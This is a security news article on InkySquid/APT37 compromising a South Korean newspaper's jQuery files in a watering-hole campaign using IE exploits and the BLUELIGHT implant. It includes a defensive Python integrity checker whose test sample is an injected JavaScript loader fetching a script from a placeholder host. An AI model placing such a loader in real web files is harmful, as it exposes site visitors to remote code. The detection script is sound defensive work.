
NK-linked InkySquid APT leverages IE exploits in recent attacks

North Korea-linked InkySquid group leverages two Internet Explorer exploits to deliver a custom implant in attacks aimed at a South Korean online newspaper.

Experts from cybersecurity firm Volexity reported that North Korea-linked InkySquid group (aka ScarCruft, APT37, Group123, and Reaper) leverages two Internet Explorer exploits to deliver a custom backdoor in watering hole attacks aimed at the Daily NK South Korean online newspaper (www.dailynk[.]com).

APT37 has been active since at least 2012 and has mainly targeted government, defense, military, and media organizations in South Korea.

The watering hole attacks on the Daily NK were conducted from March 2021 until early June 2021.

“The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience.” reads the post published by Volexity. “Attackers will still have some success, however, and have a good chance of avoiding detection based on the following attributes of their attack:

  • Clever disguise of exploit code amongst legitimate code, making it harder to identify
  • Only allowing exploitable user-agents access to the exploit code, making it difficult to identify at scale (such as through automated scanning of websites)
  • Use of innovative custom malware, such as BLUELIGHT, after successful exploitation using C2 mechanisms which are unlikely to be detected by many solutions”

The researchers discovered suspicious code loaded via www.dailynk[.]com that pointed to malicious subdomains of jquery[.]services. Below are some examples of the URLs used to load the malicious code:

  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery.min.js?ver=3.5.1
  • hxxps://www.dailynk[.]com/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.3.2

The attackers modified the content of legitimate files used by the website and included code that redirected visitors to load malicious JavaScript from the attacker-owned domain jquery[.]services. The malicious code was included only for short periods of time, making the attack hard to detect.
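The two detection-evasion traits described above (tampering with a legitimate static file and serving the injected loader only briefly) are what an integrity check on served assets is meant to catch. The following is an added example written for this article, not code from Volexity or from the Daily NK site: it compares a served JavaScript file against a deploy-time SHA-256 baseline and flags any absolute URL whose host is outside an allowlist. The file contents, the hostnames (`www.example-news.test`, `lib.cdn-placeholder.test`) and the allowlist are constructed placeholders, not indicators from the incident.

```python
import hashlib
import re
from urllib.parse import urlparse

# Constructed sample content (not the real files from the incident): a stand-in for
# the site's approved jquery.min.js, and the same file with an injected remote loader
# appended, which is the tampering pattern the article describes.
KNOWN_GOOD_JS = (
    '/*! jQuery v3.5.1 | (c) JS Foundation and other contributors */\n'
    '!function(e,t){"use strict";e.jQuery=e.$=function(){}}(window);\n'
)
INJECTED_LOADER = (
    'var s=document.createElement("script");'
    's.src="https://lib.cdn-placeholder.test/js/jquery-ui.js";'
    'document.head.appendChild(s);\n'
)
TAMPERED_JS = KNOWN_GOOD_JS + INJECTED_LOADER

# Hosts the site's own static JS is expected to reference. Placeholder allowlist.
ALLOWED_HOSTS = {"www.example-news.test", "code.jquery.com"}


def sha256_hex(data: str) -> str:
    """SHA-256 of the file text, hex encoded."""
    return hashlib.sha256(data.encode("utf-8")).hexdigest()


# Baseline: served path -> SHA-256 of the approved copy. In a real deployment this is
# captured at deploy time and stored outside the web root, so an attacker who can edit
# the served files cannot also edit the baseline.
BASELINE = {
    "/wp-includes/js/jquery/jquery.min.js": sha256_hex(KNOWN_GOOD_JS),
}

# Heuristic match for absolute (http/https) and protocol-relative (//host/...) URLs.
# Minified code can contain "//" inside regex literals or comments, so treat hits as
# leads to review rather than proof of compromise.
URL_RE = re.compile(r'(?:https?:)?//[^\s"\'<>()]+', re.IGNORECASE)


def referenced_hosts(js_text: str) -> set:
    """Return every host the script text references by absolute URL (lower-cased)."""
    hosts = set()
    for match in URL_RE.findall(js_text):
        url = match if match.lower().startswith("http") else "https:" + match
        host = urlparse(url).hostname
        if host:
            hosts.add(host.lower())
    return hosts


def audit(path: str, js_text: str) -> list:
    """Return findings for one served JS file; an empty list means it matches baseline
    and references only allowlisted hosts."""
    findings = []
    expected = BASELINE.get(path)
    actual = sha256_hex(js_text)
    if expected is None:
        findings.append(f"{path}: no baseline entry (unexpected file)")
    elif actual != expected:
        findings.append(
            f"{path}: hash mismatch (expected {expected[:12]}..., got {actual[:12]}...)"
        )
    for host in sorted(referenced_hosts(js_text) - ALLOWED_HOSTS):
        findings.append(f"{path}: references host outside allowlist: {host}")
    return findings


def is_clean(path: str, js_text: str) -> bool:
    return not audit(path, js_text)


if __name__ == "__main__":
    path = "/wp-includes/js/jquery/jquery.min.js"
    for label, content in (("approved", KNOWN_GOOD_JS), ("tampered", TAMPERED_JS)):
        print(label, audit(path, content) or ["OK"])
```

Two operational points follow from the article rather than from the code. First, since the loader was served only to exploitable user-agents, the content being audited has to be fetched with the same User-Agent strings real visitors present (including Internet Explorer), not only with a scanner's default; a fetch that the server does not consider exploitable will match the baseline and prove nothing. Second, since the injected code was present only for short windows, the check has to run on a schedule frequent enough to land inside one of those windows, and every mismatch should be retained with a timestamp so the window itself becomes visible.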

The threat actors leverage exploits for two Internet Explorer vulnerabilities, tracked as CVE-2020-1380 and CVE-2021-26411, that were respectively patched in August 2020 and March 2021.

CVE-2020-1380 is a Scripting Engine Memory Corruption Vulnerability that received a CVSS score of 7.5, while CVE-2021-26411 is an Internet Explorer Memory Corruption vulnerability that received a CVSS score of 8.8.

Both vulnerabilities have been actively exploited in the wild by threat actors, and CVE-2021-26411 had already been exploited by North Korean APT groups in attacks aimed at security researchers working on vulnerability research in January.

According to the experts, BLUELIGHT is used as a second-stage payload after the successful delivery of the initial Cobalt Strike payload.

BLUELIGHT was used to gather intelligence on the infected system and to provide remote access to the attackers. It supports the following commands:

  • Execute downloaded shellcode.
  • Download and launch an executable, then upload program output.
  • Harvest cookies and a password database for supported browsers.
    — Supports: Win7 IE, Win10 IE, Edge, Chrome, and Naver Whale
  • Recursively search a path and upload file metadata (timestamps, size, and full path).
  • Spawn a thread to recursively search a path and upload files as a ZIP archive.
  • Terminate the file upload thread.
  • Uninstall the implant.

“While SWCs are not as popular as they once were, they continue to be a weapon in the arsenal of many attackers. The use of recently patched exploits for Internet Explorer and Microsoft Edge will only work against a limited audience. Attackers will still have some success, however, and have a good chance of avoiding detection base” conclude the experts.


Pierluigi Paganini

(SecurityAffairs – hacking, InkySquid)
